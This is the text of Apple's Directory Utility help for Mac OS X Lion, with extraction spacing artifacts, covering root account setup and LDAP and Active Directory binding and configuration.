1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. From the File menu, choose Connect. 7. Enter the following connection and authentication information for the server you want to configure. Address: Enter the DNS host name or IP address of the server you want to configure. User Name: Enter the user name of an administrator on the s erver.
Pas sword: Enter the password for the user name. 8. Click Connect. 9. Click the Services, Search Policy, and Directory Editor tabs and change s ettings as needed. Changes you make affect the remote server you connected to in the previous s teps. 10. From the File menu on your computer, choose Disconnect.
Directory Utility
Get started
Root account
The root account is an unrestricted adminis trator account used to perform changes to critical system files. You can enable the root account and change its pass word using Directory Utility. Enable the root account You can us e Directory Utility to enable the root account. If you enable the root account, us e a complex pas sword that contains alphanumeric and s pecial characters, to prevent the pass word from being compromised. WARNING: The root account is an unres tricted administrator account used to perform changes to critical system files. Even if you are logged in as an administrator, you mus t us e the root account or sudo to perform critical system tasks . Avoid using the root account to log in to a computer remotely or locally. Instead, use the sudo command-line tool to perform tasks that require root user privileges. You can restrict access to sudo by adding users to the /etc/sudoers/ file. If you log in us ing the root account, log out as soon as you finish performing tasks that require root user privileges. 1. Open Sys tem Preferences and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Choose Edit > Enable Root User. Change the root account password You can us e Directory Utility (located in Users & Groups preferences ) to change the root account password. When changing the root password, us e a complex pass word that contains alphanumeric and special characters, to prevent the password from being compromised. WARNING: The root account is an unres tricted administrator account used to perform changes to critical system files. Even if you are logged in as an administrator, you mus t us e the root account or sudo to perform critical system tasks . Avoid using the root account to log in to a computer remotely or locally. Instead, use the sudo command-line tool to perform tasks that require root user privileges. You can restrict access to sudo by adding users to the /etc/sudoers/ file. If you log in us ing the root account, log out as soon as you finish performing tasks that require root user privileges. 1. Open Sys tem Preferences and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Choose Edit > Change Root Pas sword
7. When prompted, enter the new root password in the Pas sword and Verify fields. 8. Click OK.
Directory Utility
LDAP directories
Configure access to an LDAP directory

Using Directory Utility, you can specify how your Mac computer acces ses an LDAPv3 directory if you know the DNS host name or IP address of the LDAP directory server. If the directory is not hosted by a server that supplies its own mappings (such as a Mac s erver) you must know the s earch base and the template for mapping Mac OS X data to the directorys data. Supported mapping templates are: Open Directory Server, for a directory that uses the Mac server s chema Active Directory, for a directory hosted by a Windows 2000, Windows 2003, or later server RFC 2307, for most directories hosted by UNIX s ervers The LDAPv3 plug-in fully supports Open Directory replication and failover. If the Open Directory master becomes unavailable, the plug-in falls back to a nearby replica. To specify custom mappings for the directory data, follow the instructions in Configure acces s to an LDAP directory manually instead of the instructions here. Important: If your computer name contains a hyphen, you might not be able to join or bind to a Directory Domain s uch as LDAP or Active Directory. To es tablis h binding, use a computer name that does not contain a hyphen.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select LDAPv3 and click the Edit button (/). 8. Click New, then click Edit. By default, the new directory connection is enabled. For more information about enabling or disabling a directory connection, see Enable or disable directory s ervice. 9. Enter a name in the Configuration Name field. 10. Enter the LDAP s ervers DNS host name or IP address in the Server Name or IP Address field. 11. Select Encrypt using SSL if you want Open Directory to use Secure Sockets Layer (SSL) for connections with the LDAP directory. Before you select this, ask your Open Directory administrator to determine if SSL is needed. If Directory Utility cant contact the LDAP server, you might need to adjust your configuration access settings . For more information, see Change the connection s ettings for an LDAP or Open Directory server. 12. Click Search & Mappings. 13. From the "Access this LDAPv3 server us ing" pop-up menu, choos e Open Directory and enter a s earch base. Typically, the search base s uffix is derived from the servers DNS hos t name. For example, the search base suffix could be dc=ods,dc=example,dc=com for a server whose DNS host name is ods.example.com.
14. If the directory server s upports trusted binding, click Bind and enter the name of the computer and the name and password of a directory administrator. The binding might be optional. Trusted binding is mutual: each time the computer connects to the LDAP directory, they authenticate each other. If trusted binding is set up or the LDAP directory does nt support trusted binding, the Bind button does not appear. Make sure you supply the correct computer name. If you see an alert saying that a computer record exists, try again us ing a different computer name, or click Overwrite to replace the exis ting computer record. The existing computer record might be abandoned, or it might belong to another computer. If you replace an existing computer record, notify the LDAP directory administrator in case replacing the record disables another computer. In this case, the LDAP directory administrator mus t give the dis abled computer a different name and add it back to the computer group it belonged to. 15. Click Security. If the Active Directory requires authentication to connect, select Use authentication when connecting and enter the distinguis hed name and password of a user account in the directory. An authentication connection is not mutual: the LDAP s erver authenticates the client but the client doesnt authenticate the server. The distinguished name can specify any user account that has permission to see data in the directory. For example, a user account whose s hort name is dirauth on an LDAP server and whos e addres s is ods.example.com would have the distinguis hed name uid=dirauth,cn=users ,dc=ods,dc=example,dc=com. Important: If the distinguished name or pas sword are incorrect, you can log in to the computer using a user account from the LDAP directory. 16. Click OK to finish creating the LDAP connection. 17. Click OK to finish configuring LDAPv3 options. If you want the computer to access the LDAP directory you created a configuration for, add the directory to a custom search policy in the Authentication pane and the Contacts pane of Search Policy in Directory Utility, then make sure it is enabled in Services. For information about creating search policies, see Define s earch policies . For information about enabling a directory service, see Enable or disable directory service.
Directory Utility
LDAP directories
Reconfigure LDAP directory access

You can change, duplicate, or delete configuration settings for an LDAP server. If your LDAP server acces s requirements change, you can change them. If you are adding a similar LDAP server that only needs minor connection s etting changes, you can duplicate the settings of an exis ting LDAP connection. If you need to delete an LDAP connection, you can delete it. Change a configuration for accessing an LDAP directory You can us e Directory Utility to change the settings of an LDAP directory configuration. The configuration settings specify how Open Directory accesses an LDAPv2 or LDAPv3 directory. If the LDAP configuration was provided by DHCP, it cant be changed, so this type of configuration is dimmed in the LDAP configurations list. 1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services. 7. In the list of s ervices , select LDAPv3 and click the Edit button (/). 8. If the lis t of server configurations is hidden, click Show Options. 9. Make changes as needed to the following settings: Enable: Click a checkbox to enable or disable access to an LDAP directory s erver. Configuration Name: Double-click a configuration name to edit it. Server Name or IP Address : Double-click a server name or IP addres s to change it. LDAP Mapping: From the pop-up menu, choose a template, enter the s earch base suffix for the LDAP directory, and click OK. If you choose a template, you must enter a search base suffix or the computer cant find information in the LDAP directory. Typically, the search base s uffix is derived from the s ervers DNS hos t name. For example, for a server whose DNS host name is ods.example.com, the s earch base suffix is dc=ods,dc=example,dc=com. If you choose From Server instead of a template, a search base s uffix is not needed. In this case, Open Directory as sumes the search base suffix is the firs t level of the LDAP directory. If you choose Custom, you must set up mappings between the Mac OS X record types and attributes and the classes and attributes of the LDAP directory youre connecting to. For more information, s ee Configure LDAP Searches & Mappings. SSL: Click the checkbox to enable or dis able encrypted communications using the SSL protocol. Before you select the SSL checkbox, ask your Open Directory administrator if SSL is needed. 10. To change the following default s ettings for this LDAP configuration, click Edit to display the options for the selected LDAP configuration, make changes, and click OK when you finish editing the LDAP configuration options : Click Connection to set timeout options, s pecify a custom port, ignore server referrals , or force use of the LDAPv2 (readonly) protocol. For more information, see Change the connection settings for an LDAP or Open Directory server. Click Search & Mappings to s et up searches and mappings for an LDAP server. For more information, see Set up trusted binding for an LDAP directory. Click Security to set up an authenticated connection (instead of trus ted binding) and other security policy options. For more information, see Change the security policy for an LDAP connection. Click Bind to set up trusted binding, or click Unbind to stop trusted binding. (You might not see these buttons if the LDAP directory doesnt permit trusted binding.) For more information, see Set up trusted binding for an LDAP directory. 11. To finish changing the configuration to access an LDAP directory, click OK. Duplicate a configuration for accessing an LDAP directory You can us e Directory Utility to duplicate a configuration that s pecifies how Mac OS X access es an LDAPv3 or LDAPv2 directory. After duplicating an LDAP directory configuration, you can change its settings to make it different from the original configuration. 1. On your computer, open System Preferences and click Users & Groups. 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select LDAPv3 and click the Edit button (/). 8. If the lis t of server configurations is hidden, click Show Options. 9. In the list, s elect a server configuration and then click Duplicate. 10. Change the duplicate configurations settings : Enable: Click a checkbox to enable or disable access to an LDAP directory s erver.
Configuration Name: Double-click a configuration name to edit it. Server Name or IP Address : Double-click a server name or IP addres s to change it. LDAP Mapping: Choose a template from the pop-up menu, then enter the search bas e suffix for the LDAP directory and click OK. If you choose a template, you must enter a search base suffix or the computer cant find information in the LDAP directory. Typically, the search base s uffix is derived from the s ervers DNS hos t name. For example, for a server whose DNS host name is ods.example.com, the s earch base suffix is dc=ods,dc=example,dc=com. If you choose From Server instead of a template, a search base s uffix is not needed. In this case, Open Directory as sumes the search base suffix is the firs t level of the LDAP directory. If you choose Custom, you must set up mappings between the Mac OS X record types and attributes and the classes and attributes of the LDAP directory youre connecting to. For more information, s ee Configure LDAP Searches & Mappings. SSL: Click the checkbox to enable or dis able encrypted communications using the SSL protocol. Before you select the SSL checkbox, ask your Open Directory administrator if SSL is needed. 11. To change the following default s ettings for the duplicate LDAP configuration, click Edit to dis play the options, make changes, and click OK when you finish editing them: Click Connection to set up trusted binding (if the LDAP directory supports it), set timeout options, s pecify a custom port, ignore server referrals , or force use of the LDAPv2 (read-only) protocol. For more information, see Change the connection settings for an LDAP or Open Directory server. Click Search & Mappings to s et up searches and mappings for an LDAP server. For more information, see Set up trusted binding for an LDAP directory. Click Security to set up an authenticated connection (instead of trus ted binding) and other security policy options. For more information, see Change the security policy for an LDAP connection. Click Bind to set up trusted binding, or click Unbind to stop trusted binding. (You might not see these buttons if the LDAP directory doesnt permit trusted binding.) For more information, see Set up trusted binding for an LDAP directory. 12. To finish changing the duplicate configuration, click OK. 13. If you want the computer to acces s the LDAP directory specified by the duplicate configuration you created, add the directory to a custom search policy in the Authentication or Contacts pane of Search Policy in Directory Utility and make s ure LDAPv3 is enabled in the Services pane. For more information, s ee Enable or dis able directory service, and Define search policies. Delete a configuration for accessing an LDAP or Open Directory server You can us e Directory Utility to delete a configuration that specifies how the computer accesses an LDAPv3 or LDAPv2 directory. If the LDAP configuration was provided by DHCP, it cant be changed, so this configuration option is dimmed in the LDAP configurations list. 1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select LDAPv3 and click the Edit button (/). 8. If the lis t of server configurations is hidden, click Show Options. 9. In the list, s elect a server configuration and click Delete, then click OK. 10. Choose from the following: If you see an alert saying the computer is bound to the LDAP directory and you want to stop trusted binding, click OK and
then enter the name and password of an LDAP directory administrator (not a local computer administrator). If you see an alert saying the computer cant contact the LDAP s erver, you can click OK to forcibly s top trus ted binding. If you forcibly stop trus ted binding, this computer still has a computer record in the LDAP directory. Notify the LDAP directory administrator so the administrator knows to remove the computer from the computer group. The deleted configuration is removed from the custom search policies for authentication and contacts .
Directory Utility
LDAP directories
Set up trusted binding for an LDAP directory

You can us e Directory Utility to set up trusted binding between the computer and an LDAP directory that s upports trusted binding. The binding is mutually authenticated by an authenticated computer record thats created in the directory when you set up trusted binding. The computer cant be configured to use trusted LDAP binding and a DHCP-s upplied LDAP directory. Trusted LDAP binding is inherently static, but DHCP-s upplied LDAP is dynamic. Important: If you are in a dual directory configuration, avoid trusted binding to a server that is not being us ed for authentication. This prevents Kerberos realm conflicts between the two directory s ervers. Als o avoid trusted binding clients whos e hos tname is not statically ass igned. Changes in hos tname affect the name of the computer account and may require rebinding. Use anonymous binding ins tead. Important: In Lion Server, every server by default is an Open Directory master and every Open Directory master has a diradmin user. When binding two directory s ervers, they should not have the same directory adminis trator user name (diradmin). If two default installation of Lion Server are bound to each other they become an invalid configuration, and can cause random failures. Make one Open Directory master server a s tandalone server, then recreate it us ing Server Admin with a unique us ername for the directory administrator, instead of the default diradmin. To us e trusted LDAP binding, clients need Mac OS X v10.6 or later or Mac OS X v10.6 Server or later. Clients using v10.5 can use anonymous binding, but cant set up trusted binding.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Edit. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select LDAPv3 and click the Edit button (/). 8. If the lis t of server configurations is hidden, click Show Options. 9. In the list, s elect a server configuration and click Edit. Several options appear, including the Bind button. If the Bind button does nt appear, the LDAP directory doesnt s upport trusted binding. 10. Click Bind, then enter the following credentials and click OK. Enter the name of the computer and the name, and password of an LDAP directory domain adminis trator. The computer name cant be in use by another computer for trusted binding or other network services. 11. Verify that you supplied the correct computer name. If you see an alert saying that a computer record exists, click Cancel to go back and change the computer name, or click Overwrite to replace the existing computer record. The existing computer record might be abandoned or it might belong to another computer. If you replace an existing computer record, notify the LDAP directory adminis trator s o that replacing the record won't disable another computer. In such a situation, the LDAP directory administrator must give the disabled computer another name and add it to the computer group it belonged to, using a different name for that computer.
12. To finish setting up trusted binding, click OK.
Directory Utility
LDAP directories
Change the security policy for an LDAP connection

Using Directory Utility, you can configure a stricter security policy for an LDAPv3 connection than the security policy of the LDAP directory. For example, if the LDAP directorys s ecurity policy permits clear-text pass words, you can set an LDAPv3 connection to not permit clear-text pass words. Setting a stricter s ecurity policy protects your computer from a malicious hacker trying to us e a rogue LDAP s erver to gain control of your computer. The computer must communicate with the LDAP server to s how the state of the security options . Therefore when you change security options for an LDAPv3 connection, the computers authentication search policy s hould include the LDAPv3 connection. The permiss ible s ettings of an LDAPv3 connections security options are subject to the LDAP servers security capabilities and requirements. For example, if the LDAP server doesnt s upport Kerberos authentication, several LDAPv3 connection s ecurity options are disabled.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Search Policy. 7. Click Authentication and make sure the LDAPv3 directory you want is listed in the search policy. For more information about adding the LDAPv3 directory to the authentication search policy, see Define search policies. 8. Click Services. 9. In the list of s ervices , select LDAPv3 and click the Edit button (/). 10. If the lis t of server configurations is hidden, click Show Options. 11. Select the configuration for the directory you want, then click Edit. 12. Click Security and then change any of the following settings. Note: The s ecurity settings here and on the corresponding LDAP server are determined when the LDAP connection is set up. The settings arent updated when server s ettings are changed. If any of the las t four options are selected but disabled, the LDAP directory requires them. If any of these options are unselected and disabled, the LDAP server doesnt support them. Use authentication when connecting: Determines whether the LDAPv3 connection authenticates itself with the LDAP directory by s upplying the specified dis tinguished name and password. This option is not vis ible if the LDAPv3 connection us es trus ted binding with the LDAP directory. Bound to the directory as: Specifies the credentials the LDAPv3 connection uses for trusted binding with the LDAP directory. This option and the credentials cant be changed here. Instead, you can unbind and then bind again with different credentials. For more information, see Stop trus ted binding with an LDAP directory and Set up trus ted binding for an LDAP directory. This option is not visible unless the LDAPv3 connection uses trusted binding. Disable clear text passwords : Determines whether the password is to be sent as clear text if it cant be validated using an authentication method that sends an encrypted pass word. Digitally s ign all packets (requires Kerberos ): Certifies that directory data from the LDAP server hasnt been intercepted and modified by another computer while en route to your computer. Encrypt all packets (requires SSL or Kerberos ): Requires the LDAP s erver to encrypt directory data using SSL or Kerberos before sending it to your computer. Before you select Encrypt all packets (requires SSL or Kerberos ), as k your Open Directory administrator if SSL is needed.
Block man-in-the-middle attacks (requires Kerberos): Protects against a rogue server posing as the LDAP server. Best if us ed with the Digitally sign all packets option.
Directory Utility
LDAP directories
Enable LDAP bind authentication for a user

You can enable the use of LDAP bind authentication for a user account s tored in an LDAP directory domain. When you us e this pas sword validation technique, you rely on the LDAP s erver that contains the us er account to authenticate the us ers password. Important: If your computer name contains a hyphen, you might not be able to join or bind to a directory domain such as LDAP or Active Directory. To es tablis h binding, use a computer name that does not contain a hyphen.
1. Make sure the Mac computer that needs to authenticate the us er account has a connection to the LDAP directory where the us er account res ides and that the computers s earch policy includes the LDAP directory connection. For information about configuring LDAP server connections and the s earch policy, s ee Configure acces s to an LDAP directory. If you configure an LDAP connection that doesnt map the password and authentication authority attributes, bind authentication occurs automatically. For more information, s ee Configure LDAP Searches & Mappings. 2. If you configure the connection to permit clear-text passwords, als o configure it to use SSL to protect the clear-text password while it is in transit. For more information, s ee Change the security policy for an LDAP connection and Change the connection settings for an LDAP or Open Directory server.
Directory Utility
Activ e Directory
About Active Directory access

You can configure Mac to access basic user account information in an Active Directory domain of a Windows 2000 or later server. This is pos sible because of an Active Directory connector for Directory Utility. This Active Directory connector is listed in the Services pane of Directory Utility. You do not need to make schema changes to the Active Directory domain to get basic us er account information. You might want to change the default access control list (ACL) of specific attributes so computer accounts can read user properties. The Active Directory connector generates all attributes required for Mac OS X authentication from s tandard attributes in Active Directory user accounts . The connector also supports Active Directory authentication policies, including pass word changes, expirations , forced changes, and s ecurity options . Mac OS X supports packet encryption and packet-s igning options for all Windows Active Directory domains . This functionality is on by default as allow. You can change the default setting to disabled or required by us ing the dsconfigad command-line tool. The packet encryption and packet s igning options ensure all data to and from the Active Directory Domain for record lookups is protected. The Active Directory connector dynamically generates a unique user ID and a primary group ID based on the user accounts Globally Unique ID (GUID) in the Active Directory domain. The generated user ID and primary group ID are the same for each user account, even if the account is used to log in to different Mac computers. Alternatively, you can force the Active Directory connector to map the us er ID to Active Directory attributes that you specify. The Active Directory connector generates a group ID bas ed on the Active Directory group accounts GUID. You can also force the plug-in to map the group ID for group accounts to Active Directory attributes that you s pecify. When someone logs in to a Mac using an Active Directory user account, the Active Directory connector can mount the Windows network home folder specified in the Active Directory user account as the users home folder. You can specify whether to use the network home specified by Active Directorys standard home Directory attribute or by Mac OS X's home Directory attribute (if the Active Directory schema is extended to include it). Alternatively, you can configure the plug-in to create a local home folder on the s tartup volume of the Mac client computer. In this cas e, the plug-in also mounts the users Windows network home folder (s pecified in the Active Directory user account) as a network volume, like a share point. Us ing the Finder, the user can then copy files between the Windows home folder network
volume and the local Mac home folder. The Active Directory connector can als o create mobile accounts for users. A mobile account has a local home folder on the startup volume of the Mac client computer. (The user also has a network home folder as specified in the us ers Active Directory account.) A mobile account caches the users Active Directory authentication credentials on the Mac client computer. The cached credentials permit the user to log in using the Active Directory name and password when the client computer is dis connected from the Active Directory server. A mobile account has a local home folder on the startup volume of the Mac client computer. (The us er also has a network home folder as specified in the users Active Directory account.) If the Active Directory schema is extended to include Mac OS X record types (object clas ses) and attributes, the Active Directory connector detects and acces ses them. For example, the Active Directory s chema could be changed using Windows adminis tration tools to include Mac OS X managed client attributes. This schema change enables the Active Directory connector to support managed client settings made using the Server app. Mac clients assume full read access to attributes that are added to the directory. Therefore, it might be neces sary to change the ACL of those attributes to permit computer groups to read these added attributes. The Active Directory connector discovers all domains in an Active Directory fores t. You can configure the plug-in to permit users from any domain in the forest to authenticate on a Mac computer. Alternatively, you can permit only s pecific domains to be authenticated on the client. The Active Directory connector fully s upports Active Directory replication and failover. It dis covers multiple domain controllers and determines the clos est one. If a domain controller becomes unavailable, the plug-in falls back to another nearby domain controller. The Active Directory connector uses LDAP to access Active Directory user accounts and Kerberos to authenticate them. The Active Directory connector does not use Microsofts proprietary Active Directory Services Interface (ADSI) to get directory or authentication services.
Directory Utility
Activ e Directory
Configure access to an Active Directory domain

Using the Active Directory connector listed in Directory Utility, you can configure a Mac to acces s bas ic user account information in an Active Directory domain on a Windows s erver. The Active Directory connector generates all attributes required for Mac OS X authentication. No changes to the Active Directory schema are required. The Active Directory connector detects and acces ses standard Mac OS X record types and attributes (such as the attributes required for Mac OS X client management), if the Active Directory schema is extended to include them. WARNING: With the advanced options of the Active Directory connector, you can map to the Mac OS X unique user ID (UID), primary group ID (GID), and group GID attribute to the correct attributes that have been added to the Active Directory s chema. However, if you change the setting of these mapping options later, users might lose access to previously created files. Important: If your computer name contains a hyphen you might not be able to join or bind to a Directory Domain such as LDAP or Active Directory. To es tablis h binding, use a computer name that does not contain a hyphen.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select Active Directory and click the Edit button (/). 8. Enter the DNS hos t name of the Active Directory domain you want to bind to the computer youre configuring. The administrator of the Active Directory domain can tell you the DNS host name to enter.
9. If neces sary, edit the Computer ID. The Computer ID is the name the computer is known by in the Active Directory domain, and its pres et to the name of the computer. You might change this to conform to your organizations es tablished scheme for naming computers in the Active Directory domain. If youre not s ure, as k the Active Directory domain administrator. 10. (Optional) Set advanced options. If the advanced options are hidden, click Show Advanced Options and set options in the Us er Experience, Mappings , and Administrative panes. You can also change advanced option settings later. 11. Click Bind, use the following to authenticate as a user who has rights to bind a computer to the Active Directory domain, select the search policies you want Active Directory added to (see below), and click OK: Username and Password: You might be able to authenticate by entering the name and pass word of your Active Directory us er account, or the Active Directory domain adminis trator might need to provide a name and password. Computer OU: Enter the organizational unit (OU) for the computer youre configuring. Use for authentication: Use to determine whether Active Directory is added to the computers authentication search policy. Use for contacts: Us e to determine whether Active Directory is added to the computers contacts search policy. When you click OK, Directory Utility sets up trusted binding between the computer youre configuring and the Active Directory server. The computers search policies are set according to the options you selected when you authenticated, and Active Directory is enabled in Directory Utilitys Services pane. With the default settings for Active Directory advanced options, the Active Directory forest is added to the computers authentication search policy and contacts search policy if you selected Us e for authentication or Use for contacts. However, if you deselect Allow authentication from any domain in the forest in the Administrative advanced options pane before clicking Bind, the nearest Active Directory domain is added ins tead of the fores t. You can change search policies later by adding or removing the Active Directory forest or individual domains. For more information, see Define search policies. 12. (Optional) Join the server to the Active Directory Kerberos realm: a. On the server or an administrator computer that can connect to the server, open Server Admin and s elect Open Directory for the server. b. Click Settings, then click General. c. Click Join Kerberos, then choose the Active Directory Kerberos realm from the pop-up menu and enter credentials for a local administrator on this server. For more information, s ee Join a s erver to a Kerberos realm.
Directory Utility
Activ e Directory
Set up mobile user accounts in Active Directory

You can enable or dis able mobile Active Directory us er accounts on a computer that is configured to us e Directory Utilitys Active Directory connector. Users with mobile accounts can log in using their Active Directory credentials when the computer is not connected to the Active Directory server. The Active Directory connector caches credentials for a us ers mobile account when the us er logs in while the computer is connected to the Active Directory domain. This credential caching does not require changing the Active Directory schema. If the Active Directory schema is extended to include Mac OS X Lion managed client attributes, those mobile account s ettings are used instead of the Active Directory connector mobile account s etting. You can have mobile accounts created automatically or you can require that Active Directory users confirm creation of a mobile account.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit.
4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select Active Directory and click the Edit button (/). 8. If the advanced options are hidden, click Show Advanced Options. 9. Click User Experience, then click Create mobile account at login, and optionally click Require confirmation before creating a mobile account. Note the following: If both options are selected, each us er decides whether to create a mobile account during login. When a user logs in to Mac OS X using an Active Directory user account, or when logging in as a network user, the user s ees a dialog with controls for creating a mobile account immediately. If the first option is selected and the second option is unselected, mobile accounts are created when users log in. If the first option is not selected, the second option is dis abled. 10. Click OK.
Directory Utility
Activ e Directory
Set up home folders for Active Directory user accounts

On a computer thats configured to use the Directory Utility Active Directory connector, you can enable or dis able network home folders or local home folders for Active Directory us er accounts. With network home folders, a users Windows network home folder is mounted as the Mac OS X home folder when the user logs in. You determine whether the network home folder location is obtained from the Active Directory standard homeDirectory attribute or from the Mac OS X homeDirectory attribute, if the Active Directory schema is extended to include it. With local home folders , each Active Directory user who logs in has a home folder on the Mac OS X startup disk. In addition, the users network home folder is mounted as a network volume, like a share point. The user can copy files between this network volume and the local home folder.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select Active Directory and click the Edit button (/). 8. If the advanced options are hidden, click Show Advanced Options. 9. Click User Experience. 10. If you want Active Directory user accounts to have local home folders in the computers /Users folder, click Force local home folder on startup disk. This option is not available if Create mobile account at login is s elected. 11. To use the Active Directory standard attribute for the home folder location, select Use UNC path from Active Directory to derive network home location and then choose from the following protocols for accessing the home folder: To use the standard Windows protocol SMB, choose s mb from the Network protocol to be used pop-up menu. To use the standard Macintosh protocol AFP, choose afp from the Network protocol to be us ed pop-up menu. 12. To use the Mac OS X attribute for the home folder location, deselect Use UNC path from Active Directory to derive network
home location. To use the Mac OS X attribute, the Active Directory s chema must be extended to include it. 13. Click OK. If you change the name of a us er account in the Active Directory domain, the server creates a home folder (and s ubfolders) for the user account the next time it is used for logging in to a Mac OS X computer. The user can s till navigate to the old home folder and see its contents in the Finder. You can prevent creation of a home folder by renaming the old folder before the user next logs in.
Directory Utility
Activ e Directory
Specify a preferred Active Directory server

On a computer thats configured to use Directory Utilitys Active Directory connector, you can specify the DNS hos t name of the server whose Active Directory domain you want the computer to access by default. If the server becomes unavailable in the future, the Active Directory connector reverts to another nearby server in the forest. If this option is deselected, the Active Directory connector determines the closest Active Directory domain in the forest.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Edit. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select Active Directory and click the Edit button (/). 8. If the advanced options are hidden, click Show Advanced Options. 9. Click Administrative. 10. Select Prefer this domain s erver and enter the DNS host name of the Active Directory server. 11. Click OK.
Directory Utility
Activ e Directory
Change the Active Directory groups that can administer the computer
On a computer thats configured to use Directory Utilitys Active Directory connector, you can identify Active Directory group accounts whos e members you want to have adminis trator privileges for the computer. Users that are members of these Active Directory group accounts can perform adminis trative tasks such as installing s oftware on the Mac computer you are configuring.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Edit. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select Active Directory and click the Edit button (/).
8. If the advanced options are hidden, click Show Advanced Options. 9. Click Administrative. 10. Select Allow administration by and change the list of Active Directory group accounts whose members you want to have administrator privileges: Add a group by clicking the Add button (+) and entering the Active Directory domain name, a backslash, and the group account name (for example, ADS\Domain Admins, IL2\Domain Admins ). Delete a group by selecting it in the list and then clicking the Delete button (). 11. Click OK.
Directory Utility
Activ e Directory
Unbind from an Active Directory Server

If the computer is using Directory Utilitys Active Directory connector to bind to an Active Directory server, you can unbind the computer from the Active Directory server. You can forcibly unbind if the computer cant contact the server or if the computer record is removed from the server.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Edit. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select Active Directory and click the Edit button (/). 8. Click Unbind, authenticate as a user who has rights to terminate a connection to the Active Directory domain, and click OK. If you see an alert saying the credentials werent accepted or the computer cant contact Active Directory, click Force Unbind to forcibly break the connection. If you forcibly unbind, Active Directory s till contains a computer record for this computer. Notify the Active Directory administrator s o the administrator knows to remove the computer record.
Directory Utility
Serv ice access
Enable or disable Active Directory service

You can us e Directory Utility to enable or disable the use of Active Directory services provided by a Windows server. Active Directory is the directory s ervice of Windows 2000 and later servers . If you disable Active Directory s ervices and Active Directory domains are part of a custom search policy, they are lis ted in red in the Authentication or Contacts pane of Search Policy in Directory Utility.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services.
7. In the list of s ervices , select LDAPv3 and click the Edit button (/). 8. Next to Active Directory connection, select or deselect the Enable checkbox and click OK.
Directory Utility
Serv ice access
Enable or disable LDAP directory services

